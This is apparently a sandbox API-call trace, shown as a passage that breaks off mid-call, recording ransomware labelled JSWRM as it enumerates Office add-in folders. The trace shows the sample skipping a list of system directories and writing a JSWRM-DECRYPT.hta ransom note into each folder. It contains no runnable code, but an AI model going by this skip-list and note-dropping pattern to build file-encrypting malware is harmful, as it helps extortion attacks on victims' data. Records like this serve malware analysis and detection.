FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc2d943c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc2d943c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2ff666, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x92aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.162] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.162] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.162] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.162] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.162] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.162] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.162] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.162] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.162] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.162] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0123.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0123.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0123.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0123.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f030 [0123.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245200 | out: hHeap=0x1e0000) returned 1 [0123.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.162] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc2d943c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc2d943c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2ff666, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x92aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 0 [0123.162] FindClose (in: hFindFile=0x231b40 | out: hFindFile=0x231b40) returned 1 [0123.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0123.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0123.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.162] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc43098a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc43098a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="id", cAlternateFileName="")) returned 1 [0123.162] lstrcmpiW (lpString1="id", lpString2=".") returned 1 [0123.162] lstrcmpiW (lpString1="id", lpString2="..") returned 1 [0123.163] lstrcmpiW (lpString1="id", lpString2="...") returned 1 [0123.163] lstrcmpiW (lpString1="id", lpString2="windows") returned -1 [0123.163] lstrcmpiW (lpString1="id", lpString2="recovery") returned -1 [0123.163] lstrcmpiW (lpString1="id", lpString2="perflogs") returned -1 [0123.163] lstrcmpiW (lpString1="id", lpString2="documents and settings") returned 1 [0123.163] lstrcmpiW (lpString1="id", lpString2="$RECYCLE.BIN") returned 1 [0123.163] lstrcmpiW (lpString1="id", lpString2="system volume information") returned -1 [0123.163] lstrcmpiW (lpString1="id", lpString2="msocache") returned -1 [0123.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0123.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0123.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0123.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0123.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0123.163] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\id\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\id\\jswrm-decrypt.hta")) returned 0xffffffff [0123.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0123.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0123.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b650 [0123.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0123.166] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\id\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\id\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.167] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.167] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.168] CloseHandle (hObject=0x338) returned 1 [0123.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0123.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0123.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0123.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0123.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0123.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0123.168] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\id\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\id\\jswrm-decrypt.hta")) returned 0x20 [0123.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.168] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0123.168] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0123.168] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\id\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc43098a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x40128163, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x231ec0 [0123.168] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.168] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc43098a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x40128163, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.168] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.169] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.169] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40128163, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x40128163, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x40128163, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.169] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.169] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.169] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.169] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.169] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.169] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.169] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.169] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.169] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.169] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0123.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0123.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241358, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.169] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0123.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0123.169] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0123.169] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xefee59ce, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeff0bc27, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xdaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.169] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.169] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.169] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.169] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.169] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.169] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.169] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.169] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.170] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.170] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0123.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0123.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0123.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0123.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244d20 [0123.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.170] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6354def, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6354def, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x25aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.170] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.170] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.170] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.170] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.170] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.170] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.170] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.170] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.170] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.170] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0123.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.170] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0123.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0123.170] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0123.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d298, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0123.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x2450c8 [0123.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244d20 | out: hHeap=0x1e0000) returned 1 [0123.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0123.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.171] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6d9d08d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6d9d08d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf755cb7d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x31040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.171] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.171] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.171] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.171] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.171] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.171] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.171] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.171] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.171] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.171] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0123.171] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.171] WideCharToMultiByte (in: CodePage=0xfde9, 